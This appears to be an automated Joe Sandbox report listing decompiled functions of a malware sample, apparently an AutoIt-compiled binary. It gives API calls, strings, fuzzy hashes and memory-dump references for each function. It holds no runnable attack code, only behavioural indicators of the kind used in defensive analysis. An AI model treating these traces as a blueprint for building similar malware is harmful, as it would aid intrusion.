                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                                  • String ID: Line:
                                                                                                                  • API String ID: 1053898822-1585850449
                                                                                                                  • Opcode ID: 168c842f7a123eb107c631110b06807e47ce081adcea9d479cf2c30b0c8898a7
                                                                                                                  • Instruction ID: ceb6a654968149d8533bd8079de40fc30f0effaa1457571fafdf6b508801a595
                                                                                                                  • Opcode Fuzzy Hash: 168c842f7a123eb107c631110b06807e47ce081adcea9d479cf2c30b0c8898a7
                                                                                                                  • Instruction Fuzzy Hash: 8531B271408780AFC320FB61EC42FDF77D8EB55394F00451AF685A6091EB70A64C8BB6
                                                                                                                  Function 00DE4139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE41A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00DE39FE,?,00000001), ref: 00DE41DB
                                                                                                                  • _free.LIBCMT ref: 00E536B7
                                                                                                                  • _free.LIBCMT ref: 00E536FE
                                                                                                                    • Part of subcall function 00DEC833: __wsplitpath.LIBCMT ref: 00DEC93E
                                                                                                                    • Part of subcall function 00DEC833: _wcscpy.LIBCMT ref: 00DEC953
                                                                                                                    • Part of subcall function 00DEC833: _wcscat.LIBCMT ref: 00DEC968
                                                                                                                    • Part of subcall function 00DEC833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00DEC978
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                  • API String ID: 805182592-1757145024
                                                                                                                  • Opcode ID: bd208e841741c0d278db049de6da4af69bfd2295d11dd1277bf592014ecc651c
                                                                                                                  • Instruction ID: 7e5f082034b82dab462bf53b5858c9af57ca0fc8d27aa5694a2b7bdde3ab3904
                                                                                                                  • Opcode Fuzzy Hash: bd208e841741c0d278db049de6da4af69bfd2295d11dd1277bf592014ecc651c
                                                                                                                  • Instruction Fuzzy Hash: B0918F71910259AFCF04EFA5DC919EEB7B4FF08354F10542AF916BB291DB70AA09CB60
                                                                                                                  Function 010BA640 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 155fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 010BA530: Sleep.KERNELBASE(000001F4), ref: 010BA541
                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010BA774
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFileSleep
                                                                                                                  • String ID: H4A5I75ES5LYUTDEFQOX5VL
                                                                                                                  • API String ID: 2694422964-3224610191
                                                                                                                  • Opcode ID: db3f202ca826135bfb363efd46ce77f7761a39ea5f1d536ef905c1bc753c62fb
                                                                                                                  • Instruction ID: fdbb2e51a99262bc8f080ee35da220fa4c1e938a0799d72ea8ad0fc976bddab2
                                                                                                                  • Opcode Fuzzy Hash: db3f202ca826135bfb363efd46ce77f7761a39ea5f1d536ef905c1bc753c62fb
                                                                                                                  • Instruction Fuzzy Hash: 39618230E04288DBEF11DBB4C854BEEBBB9AF15304F044199E6497B2C1DBB91B45CBA5
                                                                                                                  Function 00E034AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • __getstream.LIBCMT ref: 00E034FE
                                                                                                                    • Part of subcall function 00E07C0E: __getptd_noexit.LIBCMT ref: 00E07C0E
                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E03539
                                                                                                                  • __wopenfile.LIBCMT ref: 00E03549
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                  • String ID: <G
                                                                                                                  • API String ID: 1820251861-2138716496
                                                                                                                  • Opcode ID: f411b58cd6555278b7eaaa0120c65233ddeebf7d0facf54209ea8bde7fddb690
                                                                                                                  • Instruction ID: 413376a3130db5a1e28635b36fa57e6e4a9f8b163f925ef38e00beb6aadacb4a
                                                                                                                  • Opcode Fuzzy Hash: f411b58cd6555278b7eaaa0120c65233ddeebf7d0facf54209ea8bde7fddb690
                                                                                                                  • Instruction Fuzzy Hash: 02110A70E003069BDB61BFB18C4266E77E8AF05354B14A825E425FB2D1EB30CAD197A1
                                                                                                                  Function 00DFD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00DFD28B,SwapMouseButtons,00000004,?), ref: 00DFD2BC
                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00DFD28B,SwapMouseButtons,00000004,?,?,?,?,00DFC865), ref: 00DFD2DD
                                                                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,00DFD28B,SwapMouseButtons,00000004,?,?,?,?,00DFC865), ref: 00DFD2FF
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                  • API String ID: 3677997916-824357125
                                                                                                                  • Opcode ID: b35431b7daeb5fc71a01652c507de779f2539d22bc9bf531a67e22a5e20e7a25
                                                                                                                  • Instruction ID: 62118859eea14e161e257209745bbf5713f4ee2d20cfd9a41892055ad828fd9c
                                                                                                                  • Opcode Fuzzy Hash: b35431b7daeb5fc71a01652c507de779f2539d22bc9bf531a67e22a5e20e7a25
                                                                                                                  • Instruction Fuzzy Hash: FD115A75A1520CBFDB118F69DC84EBF7BFAEF05744B058429EA01E7120D671DE449B60
                                                                                                                  Function 00E0365B Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3877424927-0
                                                                                                                  • Opcode ID: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                                                  • Instruction ID: f4005aa61a3a68556c2f8fcf794542409173b35a265bae21da5d46083365394f
                                                                                                                  • Opcode Fuzzy Hash: 25276d1f646da7b76298e578b8e053e7e3b96e54df01e447abe6ae266d0f960a
                                                                                                                  • Instruction Fuzzy Hash: 5F51CDB4A00705ABDB24CFB9D88456F77B9AF40324F24972AF425B62D0D7719FD08B51
                                                                                                                  Function 00E2C396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DE4517: _fseek.LIBCMT ref: 00DE452F
                                                                                                                    • Part of subcall function 00E2C56D: _wcscmp.LIBCMT ref: 00E2C65D
                                                                                                                    • Part of subcall function 00E2C56D: _wcscmp.LIBCMT ref: 00E2C670
                                                                                                                  • _free.LIBCMT ref: 00E2C4DD
                                                                                                                  • _free.LIBCMT ref: 00E2C4E4
                                                                                                                  • _free.LIBCMT ref: 00E2C54F
                                                                                                                    • Part of subcall function 00E01C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00E07A85), ref: 00E01CB1
                                                                                                                    • Part of subcall function 00E01C9D: GetLastError.KERNEL32(00000000,?,00E07A85), ref: 00E01CC3
                                                                                                                  • _free.LIBCMT ref: 00E2C557
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1552873950-0
                                                                                                                  • Opcode ID: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
                                                                                                                  • Instruction ID: ba07b642ab557a99fc23e77aa2b63661decce6b0b2d4f76e167b170aaaebf589
                                                                                                                  • Opcode Fuzzy Hash: 7f252b61be53e347bf95bf8cf1f18cb687a3b92cb37ed7ac3162ce406380a335
                                                                                                                  • Instruction Fuzzy Hash: 5E5142B1904258AFDF14AF65DC81BAEB7B9EF48304F10009EF259B7281DB715A80CF69
                                                                                                                  Function 00DFEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DFEBB2
                                                                                                                    • Part of subcall function 00DE51AF: _memset.LIBCMT ref: 00DE522F
                                                                                                                    • Part of subcall function 00DE51AF: _wcscpy.LIBCMT ref: 00DE5283
                                                                                                                    • Part of subcall function 00DE51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00DE5293
                                                                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 00DFEC07
                                                                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DFEC16
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E53C88
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1378193009-0
                                                                                                                  • Opcode ID: 22109ebeafe32b63e48516c110d295111caa531954b9c96ed478adc30e03c3e0
                                                                                                                  • Instruction ID: 6dc29e379c882f4ba4ec568d2ea5996da11f6c003a62496882e0ab03e17ac110
                                                                                                                  • Opcode Fuzzy Hash: 22109ebeafe32b63e48516c110d295111caa531954b9c96ed478adc30e03c3e0
                                                                                                                  • Instruction Fuzzy Hash: AD21DA709047949FE7329B38DC55BE7FFEC9B05349F08148DE79A76241C7B42A888B61
                                                                                                                  Function 00DE40E5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00E53725
                                                                                                                    • Part of subcall function 00DE660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DE53B1,?,?,00DE61FF,?,00000000,00000001,00000000), ref: 00DE662F
                                                                                                                    • Part of subcall function 00DE40A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00DE40C6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: NamePath$FullLong_memset
                                                                                                                  • String ID: X$t3
                                                                                                                  • API String ID: 3051022977-2341782549
                                                                                                                  • Opcode ID: fd896de0a217aafd45c6e42b42d75683da1a2f0176ca28182091eda0204af118
                                                                                                                  • Instruction ID: 66aa6821247a6a2823460bc2f45226bc260546688db6ff6644569ee1257085ec
                                                                                                                  • Opcode Fuzzy Hash: fd896de0a217aafd45c6e42b42d75683da1a2f0176ca28182091eda0204af118
                                                                                                                  • Instruction Fuzzy Hash: D221C371A10288AFCF01EFA5C8457DEBBF99F89304F00405AE405B7241DBB49A898F71
                                                                                                                  Function 00DFF4EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00E0395C: __FF_MSGBANNER.LIBCMT ref: 00E03973
                                                                                                                    • Part of subcall function 00E0395C: __NMSG_WRITE.LIBCMT ref: 00E0397A
                                                                                                                    • Part of subcall function 00E0395C: RtlAllocateHeap.NTDLL(01070000,00000000,00000001), ref: 00E0399F
                                                                                                                  • std::exception::exception.LIBCMT ref: 00DFF51E
                                                                                                                  • __CxxThrowException@8.LIBCMT ref: 00DFF533
                                                                                                                    • Part of subcall function 00E06805: RaiseException.KERNEL32(?,?,0000000E,00E96A30,?,?,?,00DFF538,0000000E,00E96A30,?,00000001), ref: 00E06856
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                  • String ID: bad allocation
                                                                                                                  • API String ID: 3902256705-2104205924
                                                                                                                  • Opcode ID: 6a102784d38139b4a1d086a9179d7a5320683b6010e12e0c7d7709ed41b8eda4
                                                                                                                  • Instruction ID: c0b26f7c01c6581b2225d7f9e0e1cf1f06912c2ade72d65f52557221471fb713
                                                                                                                  • Opcode Fuzzy Hash: 6a102784d38139b4a1d086a9179d7a5320683b6010e12e0c7d7709ed41b8eda4
                                                                                                                  • Instruction Fuzzy Hash: 13F0C83150821E67DB04BFD8EC02AEE77EC9F00354F689126FA04F21D1DBB0D69086B5
                                                                                                                  Function 010B9260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 010B92A5
                                                                                                                  • ExitProcess.KERNEL32(00000000), ref: 010B92C4
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2070917198.00000000010B8000.00000040.00000020.00020000.00000000.sdmp, Offset: 010B8000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_10b8000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CreateExit
                                                                                                                  • String ID: D
                                                                                                                  • API String ID: 126409537-2746444292
                                                                                                                  • Opcode ID: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                                                                                                                  • Instruction ID: f12314f2bb4e18a1c44bf23fabe2e54be71005b39cc75336b0c484868b8530f4
                                                                                                                  • Opcode Fuzzy Hash: 8e3ba9fc2c51f8adf90e9822168422d2e6d76900810f8c5233ba2e98edbc58fa
                                                                                                                  • Instruction Fuzzy Hash: C1F0FFB294024CABDB60DFE4CC89FEE777CBF04705F008508FB4A9B180DA7496088B61
                                                                                                                  Function 00E2C71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00E2C72F
                                                                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00E2C746
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                  • String ID: aut
                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                  • Opcode ID: f3a8c9677990d7775c0bd26553855c696405eb7a0577df348665f105d9dcf621
                                                                                                                  • Instruction ID: 24ab93d604a3cdca306273f719c53613d3db84920b79c88896ab4dc8100cf230
                                                                                                                  • Opcode Fuzzy Hash: f3a8c9677990d7775c0bd26553855c696405eb7a0577df348665f105d9dcf621
                                                                                                                  • Instruction Fuzzy Hash: B3D05E71A0430EAFDB10ABA0EC0EF8B776C9714744F4001A0B650F50B2DAF1E6998B54
                                                                                                                  Function 00E3F8AE Relevance: 4.9, APIs: 3, Instructions: 385COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 0fa0b9d3c764e1e405d4c3b8cc8ecfe811ab985a8b7028621cf274ba32374855
                                                                                                                  • Instruction ID: d4ce9264288a54fae777e03637708eb103e115b186381a5035b1eea2368638a7
                                                                                                                  • Opcode Fuzzy Hash: 0fa0b9d3c764e1e405d4c3b8cc8ecfe811ab985a8b7028621cf274ba32374855
                                                                                                                  • Instruction Fuzzy Hash: E3F16B71A043019FC710DF24C885B6EBBE5FF88314F14992DF999AB292DB70E905CB92
                                                                                                                  Function 00DE4FFC Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DE5022
                                                                                                                  • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00DE50CB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: IconNotifyShell__memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 928536360-0
                                                                                                                  • Opcode ID: 3a6d6057e48367bc82ed7424b0c5f755a41fe72a4b6c4ed71d83bbe608e3f1ee
                                                                                                                  • Instruction ID: 9794b379383aa7a961c78f2ff8cf1f077ec5edda4607f5f5929b5707a4450c99
